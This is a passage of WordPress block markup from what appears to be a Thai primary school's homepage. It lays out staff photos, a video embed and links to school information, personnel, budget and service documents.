{\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_8cd9a2-b3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_8cd9a2-b3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"> \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"<img class=\"wp-image-574\" style=\"width: 170px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a 